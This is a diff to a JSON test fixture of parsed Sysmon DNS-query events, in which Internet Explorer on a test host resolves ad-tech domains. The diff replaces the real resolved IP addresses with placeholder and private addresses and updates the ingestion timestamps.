idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17413,11 +17209,11 @@ }, "answers": [ { - "data": "67.231.251.189", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17425,7 +17221,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17433,7 +17229,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17441,7 +17237,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17449,7 +17245,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -17457,23 +17253,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -17488,24 +17284,24 @@ "pixel.s3xified.com" ], "ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742448600Z", + "ingested": "2021-12-09T13:50:23.457545200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17565,15 +17361,15 @@ }, "answers": [ { - "data": "104.20.252.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.20.253.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17581,7 +17377,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17589,7 +17385,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17597,7 +17393,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17605,22 +17401,22 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -17635,23 +17431,22 @@ "router.infolinks.com" ], "ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742457200Z", + "ingested": "2021-12-09T13:50:23.457551Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17711,57 +17506,57 @@ }, "answers": [ { - "data": "94.23.171.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.137.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.128.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.73.243", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.144.220", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.228.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.27.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.252.5", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.4.142", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.242.60", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -17776,22 +17571,13 @@ "grey.erne.co" ], "ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742466200Z", + "ingested": "2021-12-09T13:50:23.457557300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17851,15 +17637,15 @@ }, "answers": [ { - "data": "54.243.145.203", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.221.211.153", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17867,7 +17653,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17875,7 +17661,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17883,7 +17669,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17891,7 +17677,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -17900,17 +17686,17 @@ } ], "resolved_ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -17926,24 +17712,23 @@ "sync.jivox.com" ], "ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742474700Z", + "ingested": "2021-12-09T13:50:23.457563100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18007,51 +17792,51 @@ "type": "CNAME" }, { - "data": "207.244.121.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.94.20", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.65", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.199.69", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.76.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.197.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.108.217", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.99", + "data": "89.160.20.156", "type": "A" }, { @@ -18063,79 +17848,79 @@ "type": "A" }, { - "data": "108.59.4.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.62.117.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.67", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.70", + "data": "89.160.20.156", "type": "A" }, { - "data": "199.58.84.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.98", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.116", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.73.10", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.110.3", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.69.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.74", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18143,7 +17928,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18151,7 +17936,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18159,7 +17944,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -18167,7 +17952,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -18175,7 +17960,7 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" }, { @@ -18183,7 +17968,7 @@ "type": "AAAA" }, { - "data": "192.42.93.30", + "data": "192.168.93.30", "type": "A" }, { @@ -18191,7 +17976,7 @@ "type": "AAAA" }, { - "data": "192.54.112.30", + "data": "192.168.112.30", "type": "A" }, { @@ -18199,7 +17984,7 @@ "type": "AAAA" }, { - "data": "192.43.172.30", + "data": "192.168.172.30", "type": "A" }, { @@ -18207,7 +17992,7 @@ "type": "AAAA" }, { - "data": "192.48.79.30", + "data": "192.168.79.30", "type": "A" }, { @@ -18216,57 +18001,57 @@ } ], "resolved_ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", "2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, @@ -18283,64 +18068,35 @@ "b1sync.zemanta.com" ], "ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", 